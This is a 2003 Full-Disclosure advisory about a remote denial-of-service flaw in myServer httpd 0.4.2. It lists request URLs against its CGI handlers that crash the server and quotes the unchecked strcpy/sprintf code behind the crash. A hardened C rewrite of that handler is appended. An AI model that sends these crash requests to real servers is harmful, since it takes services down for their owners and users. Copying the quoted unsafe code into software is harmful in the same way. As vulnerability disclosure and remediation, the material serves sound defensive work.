[Full-Disclosure] myServer - Remote Denial of Service

From: morning_wood (se_cur_ityat_private)
Date: Sun Jul 06 2003 - 09:37:35 PDT


    ------------------------------------------------------------------
              - EXPL-A-2003-012 exploitlabs.com Advisory 012
    ------------------------------------------------------------------
                             -= myServer =-
    
    
    
    Donnie Werner
    July 5, 2003
    
    
    Vulnerability(s):
    ----------------
    Denial of Service
    
    
    Product:
    --------
    myServer httpd  -  4.2 ( current )
    http://myserverweb.sourceforge.net
    http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerWIN32EXEC-0.4.2.zip
    http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerSRC-0.4.2.zip
    
    Description of product:
    -----------------------
    "It is a web server that allows everybody to have his own
     web server for free. It is easy to configure and manage,
     it is available for linux and windows.
    It supports the CGI, ISAPI, WinCGI and FastCGI. Visit the homepage for
    more info."
    
    note:
    http://www.securitytracker.com/alerts/2003/Jun/1006999.html
    has NOT been fixed as of ver 4.2
    
    http://www.security-protocols.com/print.php?sid=1534
    appears fixed or not an issue in 4.2 under win
    
    
    VULNERABILITY / EXPLOIT
    ======================
    
    tested on Windows XP / 2k
    
    issuing...
    
     http://[host]/cgi-bin/math_sum.mscgi?a=
     http://[host]/cgi-bin/math_sum.mscgi??=
    
    
    completely crashes the httpd on the remote host
    
    probably because..
    
    ------------ snip ------------
    
    strcpy(a,cm.GetParam("a"));
    strcpy(b,cm.GetParam("b"));
    
    sprintf(c,"%i",atoi(a)+atoi(b));
    
    ------------ snip ------------
    
    
    also..
    http://[host]/cgi-bin/post.mscgi???
    crashes server
    
    Local:
    ------
    no
    
    Remote:
    -------
    yes
    
    
    Vendor Fix:
    -----------
    No fix on 0day
    Vendor has responded and claims the fix is in the CVS,
    and will be resolved as of the upcoming 4.3 release.
    
    
    Vendor Contact:
    ---------------
    Concurrent with this advisory
    http://sourceforge.net/tracker/?func=add&group_id=63119&atid=502904
    
    
    Credits:
    --------
    Donnie Werner
    morning_woodat_private
    http://exploitlabs.com
    
    thank you "nutcase" for confirmation testing
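
A hardened form of the handler logic quoted in the advisory, as an added example (not myServer's code and not the vendor's fix). It assumes the crash comes from a parameter that is missing, empty or oversized reaching the unchecked strcpy()/sprintf() calls; get_int_param() and math_sum() are hypothetical names, and the value is parsed in place so nothing is copied into a fixed buffer.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for cm.GetParam() plus atoi(): find `name` in the
 * query string and parse its value in place, with no intermediate copy.
 * Returns -1 if the parameter is absent, empty, non-numeric or out of range. */
static int get_int_param(const char *q, const char *name, long *val)
{
    size_t nlen = strlen(name);
    while (q && *q) {
        const char *amp = strchr(q, '&');
        const char *stop = amp ? amp : q + strlen(q);
        if ((size_t)(stop - q) > nlen && q[nlen] == '=' && !strncmp(q, name, nlen)) {
            char *end;
            errno = 0;
            *val = strtol(q + nlen + 1, &end, 10);
            return (end == q + nlen + 1 || end != stop || errno == ERANGE) ? -1 : 0;
        }
        q = amp ? amp + 1 : NULL;
    }
    return -1;   /* parameter not present */
}

/* Writes a+b to out and returns 0, or returns -1 for a request to refuse. */
int math_sum(const char *query, char *out, size_t outlen)
{
    long a, b;
    if (!query || get_int_param(query, "a", &a) || get_int_param(query, "b", &b))
        return -1;
    if ((b > 0 && a > LONG_MAX - b) || (b < 0 && a < LONG_MIN - b))
        return -1;                           /* sum would overflow */
    int n = snprintf(out, outlen, "%ld", a + b);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    char out[32];  /* constructed queries; "a=" and "?=" are the advisory's shapes */
    const char *q[] = { "a=2&b=40", "a=", "?=", "a=1&b=99999999999999999999" };
    for (size_t i = 0; i < 4; i++)
        printf("%-28s -> %s\n", q[i], math_sum(q[i], out, sizeof out) ? "rejected" : out);
    return 0;
}
```

A handler built this way answers a refused request with an error response instead of continuing with unvalidated input.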